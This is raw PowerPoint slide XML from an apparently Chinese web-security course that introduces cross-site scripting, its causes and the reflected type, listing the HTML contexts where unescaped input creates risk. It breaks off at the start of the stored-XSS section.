                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>知识储备</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART04</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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7" name="TextBox 7"/>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认识跨站脚本</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="990600"/>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1.跨站脚本简介</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="1276350"/>
            <a:ext cx="11403330" cy="5692775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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跨站脚本攻击（XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>:Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）是一种常见的Web应用安全漏洞，也是最主要的网络攻击手段之一。XSS攻击通过将恶意JavaScript代码注入网页，利用用户浏览时执行，进行Cookie资料窃取、会话劫持和钓鱼欺骗等攻击。</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XSS攻击对Web服务器本身没有直接损害，而是通过网站传播，影响大量用户。攻击者常通过留言、邮件等发送恶意URL，一旦用户打开，恶意脚本便在用户计算机上悄悄执行。</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XSS攻击的本质是针对网站应用程序的安全漏洞，属于代码注入的一种形式。其特点是利用JavaScript的灵活性，操作HTML、CSS和浏览器，为攻击提供了广阔的“想象”空间。</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40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>攻击对象是用户的浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>，因为浏览器内置JavaScript解释器，能够执行JavaScript代码，而不会判断代码的恶意性。</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XSS攻击的一般过程是：攻击者将恶意代码注入服务器（如论坛、留言板、邮件等），用户在不知情的情况下访问这些内容，服务器响应含有恶意代码的网页，客户端浏览器触发并执行JS恶意代码。</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XSS攻击的危害在于其隐蔽性和广泛性，攻击者可利用它进行各种恶意行为，对用户隐私和数据安全构成严重威胁。</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7" name="TextBox 7"/>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认识跨站脚本</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1219200"/>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2. 造成XSS漏洞的原因</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1617980"/>
            <a:ext cx="10813415" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>微博、留言板、聊天室等等收集用户输入的地方，都可能被注入xss代码，都存在遭受xss的风险，只要没有对用户的输入进行严格过滤，就会被xss。当攻击者可以将恶意代码注入到服务器中，我们就认为其存在xss漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>XSS 跨站脚本攻击漏洞也是OWASP Top 10中经常出现的对象，造成XSS漏洞普遍流行的原因:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（1）Web 浏览器本身的设计不安全，无法判断 JS 代码是否是恶意的。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（2）输入与输出的 Web 应用程序基本交互防护不够。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（3）程序员缺乏安全意识，缺少对 XSS 漏洞的认知。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（4）XSS 触发简单，完全防御起来相当困难。</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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1.反射型XSS（非持久型）</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757555" y="1524000"/>
            <a:ext cx="11201400" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>反射型XSS只是简单的把用户输入的数据从服务器反射给用户浏览器，要利用这个漏洞，攻击者必须以某种方式诱导用户访问一个精心设计的URL（恶意链接），才能实施攻击。漏洞成因主要是因为，当用户的输入或者一些用户可控参数未经处理地输出到页面上，就容易产生XSS漏洞。主要场景有以下几种：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（1）将不可信数据插入到HTML标签之间时，例如div,p,td；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（2）将不可信数据插入到HTML属性里时，例如：&lt;div width=$INPUT&gt;&lt;/div&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（3）将不可信数据插入到SCRIPT里时，例如：&lt;script&gt;var message = ” $INPUT “;&lt;/script&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（4）还有插入到Style属性里的情况，同样具有一定的危害性，例如&lt;span style=” property : $INPUT ”&gt;&lt;/span&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（5）将不可信数据插入到HTML URL里时，例如：&lt;a href=”[http://www.abcd.com?param=](http://www.ccc.com/?param=) $INPUT ”&gt;&lt;/a&gt;；</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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1.反射型XSS（非持久型）</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757555" y="1524000"/>
            <a:ext cx="11201400" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>（6）使用富文本时，没有使用XSS规则引擎进行编码过滤；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（7）将不可信数据插入到HTML标签之间时，例如div, p, td；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（8）将不可信数据插入到HTML属性里时，例如&lt;div width=$INPUT&gt;&lt;/div&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（9）将不可信数据插入到SCRIPT里时，例如&lt;script&gt;var message = ” $INPUT “;&lt;/script&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（10）还有插入到Style属性里的情况，同样具有一定的危害性，例如&lt;span style=” property : $INPUT ”&gt;&lt;/span&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（11）将不可信数据插入到HTML URL里时，例如&lt;a href=”[http://www.abcd.com?param=](http://www.ccc.com/?param=) $INPUT ”&gt;&lt;/a&gt;；</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>（12）使用富文本时，没有使用XSS规则引擎进行编码过滤。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>对于以上的几个场景，若服务端或者前端没有做好防范措施，就会出现漏洞隐患。</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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1.反射型XSS（非持久型）</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757555" y="1524000"/>
            <a:ext cx="11201400" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>攻击流程具体如图10-1所示，反射型XSS通常出现在搜索等功能中，需要被攻击者点击对应的链接才能触发，且受到XSS Auditor(chrome内置的XSS保护)、NoScript等防御手段的影响较大，所以它的危害性较存储型要小。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 1" descr="1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="2819400"/>
            <a:ext cx="4398010" cy="3448685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-1 攻击流程图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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2.存储型XSS（持久型）</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977265" y="1676400"/>
            <a:ext cx="10641965" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>存储型XSS攻击是一种持久性的跨站脚本攻击，其特点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
